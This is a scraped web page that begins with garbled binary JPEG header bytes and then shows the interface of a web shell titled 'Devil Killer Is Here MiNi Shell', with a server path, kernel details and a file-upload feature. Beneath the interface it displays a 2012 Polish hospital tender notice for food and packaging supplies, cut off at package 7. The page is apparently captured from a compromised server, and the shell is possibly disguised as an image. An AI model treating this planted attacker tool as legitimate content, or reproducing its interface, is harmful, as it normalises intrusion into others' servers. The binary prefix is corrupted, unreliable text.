JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120514/153852-N-2012.html

<p class="kh_header"><b>Sosnowiec: DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH, MROŻONEK, OWOCÓW, OPAKOWAŃ JEDNORAZOWYCH</b><br>
<b>Numer ogłoszenia: 153852 - 2012; data zamieszczenia: 14.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Miejski w Sosnowcu , ul. Szpitalna 1, 41-219 Sosnowiec, woj. śląskie, tel. 32 41 30 111, faks 32 41 30 112.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH, MROŻONEK, OWOCÓW, OPAKOWAŃ JEDNORAZOWYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest dostawa artykułów spożywczych, mrożonek, owoców, opakowań jednorazowych. 
2. Zamówienie składa się z 24 pakietów, z których każdy stanowi odrębny przedmiot zamówienia. Dopuszcza się składanie ofert na osobne pakiety.
Pakiet nr 1 - Żurek - kod CPV 15800000-6 - różne produkty spożywcze.
Pakiet nr 2 - Przetwory warzywne - kod CPV 15897200-4 - produkty puszkowane; 
                     15800000-6 - różne produkty spożywcze.                    
Pakiet nr 3 - Artykuły sypkie - kod CPV 15800000-6 różne produkty spożywcze. 
Pakiet nr 4 - Przyprawy do ciast - kod CPV 15870000-7 - przyprawy i przyprawy korzenne.
Pakiet nr 5 - Przyprawy - kod CPV 15870000-7 - przyprawy i przyprawy korzenne.
Pakiet nr 6 - Napoje typu Coca-cola - kod CPV 15982000-5 - napoje orzeźwiające.
Pakiet nr 7 - Chrupki, chipsy - kod CPV 15312300-1 - chipsy ziemniaczane; 15894400-5 
                     - przekąski.
Pakiet nr 8 - Herbata - kod CPV 15863000-5 - herbata.
Pakiet nr 9 - Zupy, koncentraty - kod CPV 15891000-0 - zupy i buliony.                    
Pakiet nr 10 - Kawa naturalna - kod CPV 15861000-1 - kawa.
Pakiet nr 11 - Słodycze - kod CPV 15840000-8 - kakao, czekolada i wyroby cukiernicze.
Pakiet nr 12 - Mrożonki - kod CPV 15896000-5 - produkty głęboko mrożone.
Pakiet nr 13 - Dodatki garmażeryjne - kod CPV 15871200-6 - sosy, mieszanki przypraw 
                        i mieszanki przypraw korzennych; 	15831000-2 - cukier; 15871230-5 
                        - ketchup.
Pakiet nr 14 - Konserwy mięsne i rybne - kod CPV 15897200-4 - produkty puszkowane.                    
Pakiet nr 15 - Woda mineralna - kod CPV: kod CPV 15981000-8 - wody mineralne.
Pakiet nr 16 - Wody mineralne i napoje - kod CPV 15981000-8 - wody mineralne; 
                       15981400-2 - wody mineralne z dodatkiem substancji smakowych.
Pakiet nr 17 - Soki owocowe - kod CPV 15320000-7 - soki owocowe i warzywne.
Pakiet nr 18 - Opakowania jednorazowe - kod CPV 39222100-5 - artykuły cateringowe
                       jednorazowe.
Pakiet nr 19 - Warzywa - kod CPV 15331140-0 - warzywa liściaste i kapustne.                    
Pakiet nr 20 - Ziemniaki - kod CPV 15310000-4 - ziemniaki i produkty z   
                       	ziemniaków. 
Pakiet nr 21 - Wody typu Jurajska - kod CPV 15981000-8 - wody mineralne.
Pakiet nr 22 - Pieczarka świeża - kod CPV 03221260-6 - grzyby.
Pakiet nr 23 - Owoce krajowe - kod CPV 15300000-1 - owoce, warzywa i podobne
                       produkty.
Pakiet nr 24 - Soki jednodniowe - kod CPV 15320000-7 - soki owocowe i warzywne.
Pakiet nr 25 -  Lody - kod CPV 15.55.50.00-3 - lody

3. Szczegółowy opis przedmiotu zamówienia - asortyment oraz ilości znajdują się w załączniku nr 4.1 - 4.25 SIWZ.

Zamawiający dopuszcza składanie ofert zawierających rozwiązania równoważne. Za towar równoważny Zamawiający uważa towar o parametrach jakościowych takich samych lub zbliżonych, niż określone w opisie przedmiotu zamówienia, którego skład jest tożsamy z zamawianym przez Zamawiającego lub o parametrach i wartościach nie mniejszych i nie gorszych pod względem ilości i wartości odżywczych produktu. Dla każdego produktu żywnościowego walory smakowe muszą być takie same lub zbliżone.

4. Wymagania dotyczące zamówienia:
4.1	Wykonawca zobligowany jest do przestrzegania ustawy z dnia 25 sierpnia 2006r. 
o bezpieczeństwie żywności i żywienia tj. Dz. U. z 2010, Nr 136, poz. 914;
4.2 Wykonawca zobowiązany jest do sukcesywnej dostawy przedmiotu zamówienia wraz z rozładunkiem do wskazanych obiektów szpitalnych tj. przy ul. Szpitalnej 1 i lub ul. Zegadłowicza 3, zgodnie z wyborem Zamawiającego, ściśle wg zamówień telefonicznych;
4.3 Środek transportu dopuszczony do przewozu art. żywnościowych przez Państwową Inspekcję Sanitarną;
4.4 Wszystkie dostawy odbywać się będą na koszt Wykonawcy;
4.5 Oznakowania artykułów żywnościowych, zgodne z dyrektywami Unii Europejskiej i wytycznymi Kodeksu Żywnościowego obowiązującego w Europie:
- nazwa środka spożywczego,
- data minimalnej trwałości lub termin przydatności do spożycia,
- zawartość netto lub liczbę sztuk w opakowaniu,
- warunki przechowywania - przy znakowaniu terminem przydatności do spożycia oraz w przypadku, gdy jakość środka spożywczego w istotny sposób zależy od warunków jego przechowywania,
-  nazwę i adres producenta,
- dane wprowadzające środek spożywczy do obrotu w kraju,
-  kraj w którym wyprodukowano środek spożywczy,	
- klasę jakości handlowej lub inny wyróżnik jakości handlowej o ile określono    klasyfikację jakościową,
- oznakowanie partii produkcyjnej umożliwiającej identyfikację środka spożywczego.
5. Wymagania szczegółowe:
Pakiet nr 1
           - zamówienia telefoniczne składane z jednodniowym wyprzedzeniem wg potrzeb,
	- dostawy 1 x w tygodniu wg potrzeb,
	- art. żywnościowy powinien posiadać oznakowanie terminu przydatności do spożycia 
	min. 2 tygodnie w dniu dostawy.
      Pakiet nr 2
            - zamówienia telefonicznie z jednodniowym wyprzedzeniem
	- dostawy nie rzadziej niż raz na tydzień
	- termin przydatności do spożycia nie krótszy niż 6 miesięcy w dniu dostawy
Pakiet 3, 4, 5
            - zamówienie składane telefonicznie z dwudniowym wyprzedzeniem,
	- dostawy minimum 1 raz w tygodniu,
	- termin przydatności do spożycia nie krótszy niż 3 miesięcy w dniu dostawy,
            - opakowania jednostkowe od 10-500g. 
Pakiet 6, 15, 16, 17, 21
            - zamówienia telefoniczne dostawy nie rzadziej niż jeden raz w tygodniu
	- termin przydatności do spożycia nie krótszy niż 1 rok

      Pakiet nr 7
            - zamówienia telefonicznie
	- dostawy nie rzadziej niż jeden raz w miesiącu
      Pakiet nr 8, 9, 10, 11
            - zamówienia telefonicznie wg potrzeb
	- dostawy nie rzadziej niż raz w tygodniu
	- termin przydatności do spożycia nie krótszy niż 3 miesiące.
      Pakiet nr 12
            - zamówienie składane telefonicznie z dwudniowym wyprzedzeniem,
	- dostawy zgodnie z zamówieniem nie rzadziej niż 3x w miesiącu,
	- termin przydatności do spożycia nie krótszy niż 6 miesięcy w dniu dostawy.
	Środek transportu dopuszczony do przewozu art. żyw. mrożonych w warunkach 	chłodniczych przez Państwową Inspekcję Sanitarną - możliwość kontroli 	dokumentacji monitorowania temp. podczas transportu w dniu dostawy surowca.
Pakiet nr 13
            - zamowienia telefoniczne z jednodniowym wyprzedzeniem
	- dostawy nie rzadziej niż jeden raz w tygodniu
	- termin przydatności do spożycia w dniu dostawy nie krótszy niż 3 miesiące
Pakiet nr 14, 25
            - zamówienia telefonicznie z jednodniowym wyprzedzeniem
	- dostawy nie rzadziej niż raz na tydzień
	- termin przydatności do spożycia nie krótszy niż 6 miesięcy
	- Środek transportu dopuszczony do przewozu art. żyw. mrożonych w warunkach 	chłodniczych przez Państwową Inspekcję Sanitarną - możliwość kontroli 	dokumentacji monitorowania temp. podczas transportu w dniu dostawy surowca.
Pakiet nr 18
            - zamówienia telefoniczne wg potrzeb
		- dostawy  nie rzadziej niż dwa razy w miesiącu,
Pakiet nr 19, 20
      - zamówienia składane telefonicznie wg potrzeb z dwudniowym wyprzedzeniem
 	- dostawy nie rzadziej niż dwa razy w tygodniu, szczególnie dotyczy warzyw 
         zielonych i sezonowych
	- warzywa korzeniowe, ziemniaki segregowane wg wielkości, czyste, pakowane - 
        ok 25kg
      - okres wiosenno-letni warzywa sezonowe od 1 VI do 30 IX
	- okres jesienno - zimowy od 1 X do 30V
Pakiet nr 22:
            - zmówienia telefoniczne wg zapotrzebowań
            - dostawy dwa razy w tygodniu
Pakiet nr 23
            - zamówienia telefoniczne z jednodniowym wyprzedzeniem,
	- dostawy owoców świeżych krajowych dwa razy w tygodniu
Pakiet nr 24
            - zamowienia telefoniczne, dostawy codziennie w godzinach rannych
	- termin przydatności do spożycia zgodny z deklaracją producenta
	- możliwość zwrotu artykułów nie sprzedanych

6.  Składane oferty muszą zawierać pełny zakres przedmiotu zamówienia w zakresie danego pakietu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 39.22.21.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 25.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-   formularz ofertowy  wg wzoru stanowiącego załącznik nr 1 do SIWZ,
- formularz asortymentowo-cenowy, wg wzoru stanowiącego załącznik nr 4.1÷ 4.25 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wartość o której mowa w ust. 1 par. 4 projektu umowy może ulec zmianie w przypadku ustawowej zmiany stawki podatku VAT lub w przypadku korzystnych zmian cenowych dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.sosnowiec.pl zakładka zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Dziale Zamówień Publicznych i Zawierania Umów Szpitala Miejskiego, 41-219 Sosnowiec, ul. Szpitalna 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2012 godzina 10:30, miejsce: w Samodzielny Publiczny Szpital Miejski w Sosnowcu, 41-219 Sosnowiec, ul. Szpitalna 1, Sekretariat III piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> pakiet nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Żurek w płynie opak. 0,5L.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> pakiet nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koncentrat pomidorowy 30% op. ~4500÷4800g
Koncentrat pomidorowy 30% op. ~3200÷3300g
Koncentrat pomidorowy 30% op. 1 kg
Koncentrat pomidorowy 30% op. 400g
Koncentrat pomidorowy 30% op. 200g
Koncentrat pomidorowy 30% op. 70g
Groszek zielony konserwowy 400g
Kukurydza konserwowa 400g
Kukurydza konserwowa 2650g
Papryka konserwowa cała ~900g
Papryka konserwowa ćwiartki ~720g
Papryka konserwowa  ~500g
Papryka konserwowa  ~300g
Ogórek konserwowy 1 l
Fasolka konserwowa zielona ~720g
Fasolka konserwowa zielona ~520g
Fasolka konserwowa czerwona ~400g
Chrzan tarty na kwasku cytr. ~180g
Musztarda chrzanowa ~190g
Musztarda stołowa ~500g
Majonez wyborowy ~250g
Sok Bobofrut b/c 175 ml
Powidła śliwkowe ~300g
Dżem ~280÷330g
Dżem opakowanie 25g
Miód pszczeli naturalny opakowanie 25g
Miód pszczeli naturalny ~200g
Miód pszczeli naturalny ~400g
Miód sztuczny ~320g
Pasztet drobiowy ~130÷160g
Pasztet drobiowy 50g
Ketchup 250g
Majonez wyborowy ~720g
Majonez wyborowy ~280g
Pieczarki marynowane ~310g
Oliwki ciemne b/pestek ~140g
Oliwki zielone faszerowane papryką ~140g
Seler konserwowy ~300g
Koncentrat barszczu czerwonego ~330ml
Tuńczyk w sosie własnym ~170g
Ananas poj. ~565g
Brzoskwinia poj. ~850g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> pakiet nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mąka ziemniaczana
Cukier
Cukier puder
Herbata granulowana
Kawa zbożowa Kujawianka
Kleik ryżowy opak. 170g
Kaszka mleczno-ryżowa opak. 230÷250g
Kaszka bezmleczna owocowa opak. 230÷250g
Budyń bez cukru ~41g
Galaretka owocowa ~80g
Kisiel bez cukru opak. 45g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> pakiet nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Proszek do pieczenia 32g
Cukier waniliowy 32g
Śmietan fix  9g
Kakao  100g
Wiórki kokosowe 100g
Przyprawa do pierników ~32g
Mokate Capucino 110g
Orzechy włoskie łuskane
Czekolada mleczna 100g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> pakiet nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sól warzona biała
Pieprz prawdziwy czarny mielony
Kwasek cytrynowy
Ziele angielskie
Majeranek
Liść laurowy
Kminek
Czosnek granulowany
Papryka słodka moielona
Delikat przyprawa do mięsa
Przyprawa do ryb
Delikat przyprawa do drobiu ~25g
Przyprawa do bigosu ~20g
Przyprawa do potraw Kucharek
Przyprawa w płynie opak. 1 ÷ 5 l
Ocet spirytusowy 6% - 10% 0,5 l but.
Przyprawa do flaków 20g
Przyprawa do fasoli 20g
Sos do sałatek KNORR 9g
Żelatyna spożywcza opak. 50g
Przyprawa do piernika opak. 40g
Soda oczyszczona opak. 50g
Przyprawa Gyros ~30g
Cynamon ~20g
Goździki opak. 10g
Koper suszony 25g
Zupa typu Vifon ~60g różne smaki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> pakiet nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Coca Cola  0,5 l
Coca Cola  1  l
Coca Cola Light  0,5 l
Coke Zero  0,5 l
Coca Cola puszka  0,33 l
Sprite 0,5 l
Sprite 1  l
Nestea różne smaki  0,5 l
Fanta różne smaki  0,5 l
Fanta różne smaki  1  l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chrupki kukurydziane ~80g
Flipsy różne smaki ~ 80g
Chrupki smakowe ~80g
Chips różne smaki ~22g
Chipsy różne smaki ~50g
Orzeszki solone ~100g 
Orzechy ziemne puszka 150g
Orzeszki ~40g 
Orzeszki ziemne ~100g różne smaki
Mieszanka studencka 200g
Pistacje 100g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
